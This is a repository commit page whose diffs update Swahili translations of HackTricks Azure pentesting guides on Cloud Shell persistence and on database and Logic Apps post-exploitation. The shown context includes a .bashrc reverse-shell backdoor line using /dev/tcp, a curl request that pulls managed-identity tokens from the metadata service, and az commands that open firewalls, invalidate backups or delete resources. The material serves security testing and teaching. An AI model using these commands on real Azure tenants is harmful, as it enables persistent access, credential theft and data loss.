gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-08 13:50:50 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-persistence/az-cloud

Browse Source
This commit is contained in:
Translator
2025-02-09 14:58:51 +00:00
parent 7d2c1d2c1b
commit 633d280c94
14 changed files with 93 additions and 442 deletions
Download Patch File Download Diff File Expand all files Collapse all files

36
src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
View File

@@ -1,28 +1,15 @@
# Az - Cloud Shell Persistence
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Shell Persistence
Azure Cloud Shell inatoa ufikiaji wa amri ili kudhibiti rasilimali za Azure kwa hifadhi ya kudumu na uthibitishaji wa kiotomatiki. Washambuliaji wanaweza kutumia hili kwa kuweka backdoors katika saraka ya nyumbani ya kudumu:
Azure Cloud Shell inatoa ufikiaji wa amri ili kudhibiti rasilimali za Azure kwa kuhifadhi kudumu na uthibitishaji wa kiotomatiki. Washambuliaji wanaweza kutumia hili kwa kuweka milango ya nyuma katika saraka ya nyumbani ya kudumu:
* **Persistent Storage**: Saraka ya nyumbani ya Azure Cloud Shell imewekwa kwenye sehemu ya faili ya Azure na inabaki salama hata baada ya kikao kumalizika.
* **Startup Scripts**: Faili kama .bashrc zinafanya kazi kiotomatiki mwanzoni mwa kila kikao, kuruhusu utekelezaji wa kudumu wakati shell ya wingu inaanza.
Mfano wa backdoor katika .bashrc:
Mfano wa milango ya nyuma katika .bashrc:
{% code overflow="wrap" %}
```bash
@@ -30,7 +17,7 @@ echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/
```
{% endcode %}
Backdoor hii inaweza kutekeleza amri hata dakika 5 baada ya shell ya wingu kumalizika na mtumiaji.
Hii backdoor inaweza kutekeleza amri hata dakika 5 baada ya shell ya wingu kumalizika na mtumiaji.
Zaidi ya hayo, uliza huduma ya metadata ya Azure kwa maelezo ya mfano na tokeni:
{% code overflow="wrap" %}
@@ -40,17 +27,4 @@ curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?a
{% endcode %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

34
src/pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md
View File

@@ -1,19 +1,6 @@
# Az - CosmosDB Post Exploitation
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}
## CosmosDB Post Exploitation
Kwa maelezo zaidi kuhusu SQL Database angalia:
@@ -24,7 +11,7 @@ Kwa maelezo zaidi kuhusu SQL Database angalia:
### "Microsoft.DocumentDB/databaseAccounts/read" && "Microsoft.DocumentDB/databaseAccounts/write"
Kwa ruhusa hii, unaweza kuunda au kuboresha akaunti za Azure Cosmos DB. Hii inajumuisha kubadilisha mipangilio ya akaunti, kuongeza au kuondoa maeneo, kubadilisha viwango vya usawa, na kuwezesha au kuzima vipengele kama vile maandiko ya maeneo mengi.
Kwa ruhusa hii, unaweza kuunda au kuboresha akaunti za Azure Cosmos DB. Hii inajumuisha kubadilisha mipangilio ya akaunti, kuongeza au kuondoa maeneo, kubadilisha viwango vya usawa, na kuwezesha au kuzima vipengele kama vile maandiko ya maeneo mengi.
{% code overflow="wrap" %}
```bash
@@ -36,7 +23,7 @@ az cosmosdb update \
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/read" && "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/write"
Kwa ruhusa hii, unaweza kuunda au kubadilisha kontena (makusanyo) ndani ya database ya SQL ya akaunti ya Azure Cosmos DB. Kontena zinatumika kuhifadhi data, na mabadiliko kwao yanaweza kuathiri muundo wa database na mifumo ya ufikiaji.
Kwa ruhusa hii, unaweza kuunda au kubadilisha kontena (makusanyo) ndani ya hifadhidata ya SQL ya akaunti ya Azure Cosmos DB. Kontena zinatumika kuhifadhi data, na mabadiliko kwao yanaweza kuathiri muundo wa hifadhidata na mifumo ya ufikiaji.
{% code overflow="wrap" %}
```bash
@@ -227,17 +214,4 @@ az cosmosdb mongodb user definition create \
```
{% endcode %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

42
src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md
View File

@@ -1,19 +1,6 @@
# Az - Logic Apps Post Exploitation
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}
## Logic Apps Database Post Exploitation
Kwa maelezo zaidi kuhusu logic apps angalia:
@@ -23,7 +10,7 @@ Kwa maelezo zaidi kuhusu logic apps angalia:
{% endcontent-ref %}
### "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action"
Kwa ruhusa hizi, unaweza kubadilisha Logic App workflows na kusimamia vitambulisho vyao. Kwa haswa, unaweza kuassign au kuondoa vitambulisho vya usimamizi vilivyotolewa na mfumo na vilivyotolewa na mtumiaji kwa workflows, ambayo inaruhusu Logic App kuthibitisha na kufikia rasilimali nyingine za Azure bila akidi maalum.
Kwa ruhusa hizi, unaweza kubadilisha Logic App workflows na kusimamia vitambulisho vyao. Kwa hasa, unaweza kuassign au kuondoa vitambulisho vya usimamizi vilivyotolewa na mfumo na vitambulisho vya usimamizi vilivyotolewa na mtumiaji kwa workflows, ambayo inaruhusu Logic App kuthibitisha na kufikia rasilimali nyingine za Azure bila akreditif maalum.
{% code overflow="wrap" %}
```bash
@@ -48,7 +35,7 @@ az logicapp update \
{% endcode %}
### "Microsoft.Web/sites/stop/action", "Microsoft.Web/sites/start/action" || "Microsoft.Web/sites/restart/action"
Kwa ruhusa hii, unaweza kuanzisha/kuzima/kurestart programu ya wavuti, ikiwa ni pamoja na Logic Apps zilizohifadhiwa kwenye Mpango wa Huduma ya Programu. Kitendo hiki kinahakikisha kwamba programu iliyokuwa imezimwa hapo awali inarejeshwa mtandaoni na inaendelea na kazi zake. Hii inaweza kuharibu mchakato wa kazi, kuanzisha operesheni zisizokusudiwa, au kusababisha muda wa kukatika kwa kuanzisha, kuzima, au kurestart Logic Apps bila kutarajia.
Kwa ruhusa hii, unaweza kuanzisha/kuzima/kurestart programu ya wavuti, ikiwa ni pamoja na Logic Apps zinazohifadhiwa kwenye Mpango wa Huduma ya Programu. Kitendo hiki kinahakikisha kwamba programu iliyokuwa imezimwa hapo awali inarejeshwa mtandaoni na inaendelea na kazi zake. Hii inaweza kuharibu mchakato wa kazi, kuanzisha operesheni zisizokusudiwa, au kusababisha muda wa kukatika kwa kuanzisha, kuzima, au kurestart Logic Apps bila kutarajia.
{% code overflow="wrap" %}
```bash
@@ -61,7 +48,7 @@ az webapp start/stop/restart \
### "Microsoft.Web/sites/config/list/action", "Microsoft.Web/sites/read" && "Microsoft.Web/sites/config/write"
Kwa ruhusa hii, unaweza kuunda au kubadilisha mipangilio ya programu za wavuti, ikiwa ni pamoja na Logic Apps zilizohifadhiwa kwenye Mpango wa Huduma ya Programu. Hii inaruhusu mabadiliko ya mipangilio ya programu, nyuzi za muunganisho, mipangilio ya uthibitishaji, na zaidi.
Kwa ruhusa hii, unaweza kuunda au kubadilisha mipangilio ya programu za wavuti, ikiwa ni pamoja na Logic Apps zinazohifadhiwa kwenye Mpango wa Huduma ya Programu. Hii inaruhusu mabadiliko ya mipangilio ya programu, nyuzi za muunganisho, mipangilio ya uthibitishaji, na mengineyo.
{% code overflow="wrap" %}
```bash
@@ -73,7 +60,7 @@ az logicapp config appsettings set \
{% endcode %}
### "Microsoft.Logic/integrationAccounts/write"
Kwa ruhusa hii, unaweza kuunda, kusasisha, au kufuta akaunti za ushirikiano za Azure Logic Apps. Hii inajumuisha kusimamia mipangilio ya kiwango cha akaunti za ushirikiano kama ramani, mifano, washirika, makubaliano, na zaidi.
Kwa ruhusa hii, unaweza kuunda, kusasisha, au kufuta akaunti za ushirikiano za Azure Logic Apps. Hii inajumuisha kusimamia mipangilio ya kiwango cha akaunti ya ushirikiano kama ramani, mifano, washirika, makubaliano, na zaidi.
{% code overflow="wrap" %}
```bash
@@ -88,7 +75,7 @@ az logic integration-account create \
### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/batchConfigurations/write"
Kwa ruhusa hii, unaweza kuunda au kubadilisha mipangilio ya kundi ndani ya akaunti ya uunganisho wa Azure Logic Apps. Mipangilio ya kundi inaelezea jinsi Logic Apps inavyoshughulikia na kuunganisha ujumbe unaoingia kwa ajili ya usindikaji wa kundi.
Kwa ruhusa hii, unaweza kuunda au kubadilisha mipangilio ya kundi ndani ya akaunti ya uunganisho ya Azure Logic Apps. Mipangilio ya kundi inaelezea jinsi Logic Apps inavyoshughulikia na kuunganisha ujumbe unaoingia kwa ajili ya usindikaji wa kundi.
{% code overflow="wrap" %}
```bash
@@ -163,19 +150,6 @@ az logic integration-account session create \
{% endcode %}
### "*/delete"
Kwa ruhusa hizi unaweza kufuta rasilimali zinazohusiana na Azure Logic Apps
Kwa ruhusa hii unaweza kufuta rasilimali zinazohusiana na Azure Logic Apps
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

40
src/pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md
View File

@@ -1,19 +1,6 @@
# Az - MySQL Post Exploitation
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}
## MySQL Database Post Exploitation
Kwa maelezo zaidi kuhusu MySQL Database angalia:
@@ -24,7 +11,7 @@ Kwa maelezo zaidi kuhusu MySQL Database angalia:
### "Microsoft.DBforMySQL/flexibleServers/databases/write" && "Microsoft.DBforMySQL/flexibleServers/databases/read"
Kwa ruhusa hii, unaweza kuunda databasi mpya ndani ya mfano wa MySQL Flexible Server kwenye Azure. Ingawa kitendo hiki chenyewe hakibadilishi rasilimali zilizopo, kuunda databasi kupita kiasi au bila ruhusa kunaweza kusababisha matumizi ya rasilimali, au matumizi mabaya ya seva.
Kwa ruhusa hii, unaweza kuunda hifadhidata mpya ndani ya mfano wa MySQL Flexible Server kwenye Azure. Ingawa kitendo hiki mwenyewe hakibadilishi rasilimali zilizopo, kuunda hifadhidata nyingi kupita kiasi au zisizoidhinishwa kunaweza kusababisha matumizi ya rasilimali, au matumizi mabaya ya seva.
{% code overflow="wrap" %}
```bash
@@ -37,7 +24,7 @@ az mysql flexible-server db create \
### "Microsoft.DBforMySQL/flexibleServers/backups/write"
Kwa ruhusa hii, unaweza kuanzisha uundaji wa nakala za akiba kwa mfano wa MySQL Flexible Server kwenye Azure. Hii inawawezesha watumiaji kuunda nakala za akiba kwa mahitaji, ambazo zinaweza kuwa na manufaa kwa kuhifadhi data katika maeneo maalum ya wakati.
Kwa ruhusa hii, unaweza kuanzisha uundaji wa nakala za akiba kwa mfano wa MySQL Flexible Server kwenye Azure. Hii inawawezesha watumiaji kuunda nakala za akiba kwa mahitaji, ambazo zinaweza kuwa muhimu kwa kuhifadhi data katika maeneo maalum ya wakati.
{% code overflow="wrap" %}
```bash
@@ -50,7 +37,7 @@ az mysql flexible-server backup create \
### "Microsoft.DBforMySQL/flexibleServers/advancedThreatProtectionSettings/write"
Kwa ruhusa hii, unaweza kuunda au kusasisha mipangilio ya Advanced Threat Protection (ATP) kwa mfano wa MySQL Flexible Server kwenye Azure. Hii inaruhusu kuwezesha au kuzima vipengele vya usalama vilivyoundwa kugundua na kujibu shughuli zisizo za kawaida na vitisho vya uwezekano.
Kwa ruhusa hii, unaweza kuunda au kusasisha mipangilio ya Advanced Threat Protection (ATP) kwa mfano wa MySQL Flexible Server kwenye Azure. Hii inaruhusu kuwezesha au kuzima vipengele vya usalama vilivyoundwa kugundua na kujibu shughuli zisizo za kawaida na vitisho vinavyoweza kutokea.
{% code overflow="wrap" %}
```bash
@@ -63,7 +50,7 @@ az mysql flexible-server threat-protection-policy update \
### "Microsoft.DBforMySQL/flexibleServers/firewallRules/write"
Kwa ruhusa hii, unaweza kuunda au kubadilisha sheria za firewall kwa mfano wa MySQL Flexible Server kwenye Azure. Hii inaruhusu udhibiti juu ya anwani za IP au maeneo gani yanaweza kufikia seva. Matumizi yasiyoidhinishwa au yasiyo sahihi ya ruhusa hii yanaweza kufichua seva kwa ufikiaji usiohitajika au mbaya.
Kwa ruhusa hii, unaweza kuunda au kubadilisha sheria za firewall kwa mfano wa MySQL Flexible Server kwenye Azure. Hii inaruhusu kudhibiti ni anwani zipi za IP au maeneo gani yanaweza kufikia seva. Matumizi yasiyoidhinishwa au yasiyo sahihi ya ruhusa hii yanaweza kufichua seva kwa ufikiaji usiotakikana au mbaya.
{% code overflow="wrap" %}
```bash
@@ -87,7 +74,7 @@ az mysql flexible-server firewall-rule update \
### "Microsoft.DBforMySQL/flexibleServers/resetGtid/action"
Kwa ruhusa hii, unaweza kurekebisha GTID (Global Transaction Identifier) kwa mfano wa MySQL Flexible Server kwenye Azure. Kurekebisha GTID kutafanya kuwa batili backups zote za kiotomatiki, za mahitaji na geo-backups ambazo zilichukuliwa kabla ya hatua ya kurekebisha. Baada ya kurekebisha GTID, hautaweza kufanya PITR (point-in-time-restore) ukitumia pointi ya kurejesha haraka au kwa pointi ya kurejesha maalum ikiwa wakati wa kurejesha uliochaguliwa uko kabla ya wakati wa kurekebisha GTID. Na kurejesha kwa mafanikio kwa geo kutakuwa na uwezekano tu baada ya siku 5.
Kwa ruhusa hii, unaweza kurekebisha GTID (Global Transaction Identifier) kwa mfano wa MySQL Flexible Server kwenye Azure. Kurekebisha GTID kutafanya kuwa batili nakala zote za otomatiki, za mahitaji na geo-backups ambazo zilichukuliwa kabla ya hatua ya kurekebisha. Baada ya kurekebisha GTID, hautaweza kufanya PITR (point-in-time-restore) kwa kutumia pointi ya kurejesha haraka au kwa pointi ya kurejesha maalum ikiwa wakati wa kurejesha uliochaguliwa uko kabla ya wakati wa kurekebisha GTID. Na kurejesha kwa mafanikio kwa geo kutakuwa na uwezekano tu baada ya siku 5.
{% code overflow="wrap" %}
```bash
@@ -151,17 +138,4 @@ az mysql flexible-server start \
With this permissions you can delete resources related to mysql server in Azure such as server, firewalls, managed identities or configurations
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

36
src/pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md
View File

@@ -1,19 +1,6 @@
# Az - PostgreSQL Post Exploitation
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}
## PostgreSQL Database Post Exploitation
Kwa maelezo zaidi kuhusu PostgreSQL Database angalia:
@@ -24,7 +11,7 @@ Kwa maelezo zaidi kuhusu PostgreSQL Database angalia:
### "Microsoft.DBforPostgreSQL/flexibleServers/databases/write" && "Microsoft.DBforPostgreSQL/flexibleServers/databases/read"
Kwa ruhusa hii, unaweza kuunda hifadhidata mpya ndani ya mfano wa Postgres Flexible Server kwenye Azure. Ingawa kitendo hiki mwenyewe hakibadilishi rasilimali zilizopo, kuunda hifadhidata kupita kiasi au bila ruhusa kunaweza kusababisha matumizi ya rasilimali, au matumizi mabaya ya seva.
Kwa ruhusa hii, unaweza kuunda databasi mpya ndani ya mfano wa Postgres Flexible Server kwenye Azure. Ingawa kitendo hiki mwenyewe hakibadilishi rasilimali zilizopo, kuunda databasi nyingi au zisizoidhinishwa kunaweza kusababisha matumizi ya rasilimali, au matumizi mabaya ya seva.
{% code overflow="wrap" %}
```bash
@@ -50,7 +37,7 @@ az postgres flexible-server backup create \
### "Microsoft.DBforPostgreSQL/flexibleServers/advancedThreatProtectionSettings/write" && "Microsoft.DBforPostgreSQL/flexibleServers/advancedThreatProtectionSettings/read"
Kwa ruhusa hii, unaweza kuunda au kusasisha mipangilio ya Advanced Threat Protection (ATP) kwa mfano wa Postgres Flexible Server kwenye Azure. Hii inaruhusu kuwezesha au kuzima vipengele vya usalama vilivyoundwa kugundua na kujibu shughuli zisizo za kawaida na vitisho vinavyoweza kutokea.
Kwa ruhusa hii, unaweza kuunda au kusasisha mipangilio ya Advanced Threat Protection (ATP) kwa mfano wa Postgres Flexible Server kwenye Azure. Hii inaruhusu kuwezesha au kuzima vipengele vya usalama vilivyoundwa kugundua na kujibu shughuli zisizo za kawaida na vitisho vya uwezekano.
{% code overflow="wrap" %}
```bash
@@ -63,7 +50,7 @@ az postgres flexible-server threat-protection-policy update \
### "Microsoft.DBforPostgreSQL/flexibleServers/firewallRules/write", "Microsoft.DBforPostgreSQL/flexibleServers/read" && "Microsoft.DBforPostgreSQL/flexibleServers/firewallRules/read"
Kwa ruhusa hii, unaweza kuunda au kubadilisha sheria za firewall kwa mfano wa Postgres Flexible Server kwenye Azure. Hii inaruhusu udhibiti juu ya anwani za IP au maeneo gani yanaweza kufikia seva. Matumizi yasiyoidhinishwa au yasiyo sahihi ya ruhusa hii yanaweza kufichua seva kwa ufikiaji usiohitajika au mbaya.
Kwa ruhusa hii, unaweza kuunda au kubadilisha sheria za firewall kwa mfano wa Postgres Flexible Server kwenye Azure. Hii inaruhusu udhibiti juu ya ni anwani zipi za IP au maeneo gani yanaweza kufikia seva. Matumizi yasiyoidhinishwa au yasiyo sahihi ya ruhusa hii yanaweza kufichua seva kwa ufikiaji usiohitajika au mbaya.
{% code overflow="wrap" %}
```bash
@@ -139,17 +126,4 @@ az postgres flexible-server identity assign \
With this permissions you can delete resources related to postgres server in Azure such as server, firewalls, managed identities or configurations
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
{{#include ../../../banners/hacktricks-training.md}}

32
src/pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.md
View File

@@ -1,19 +1,6 @@
# Az - CosmosDB Privesc
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
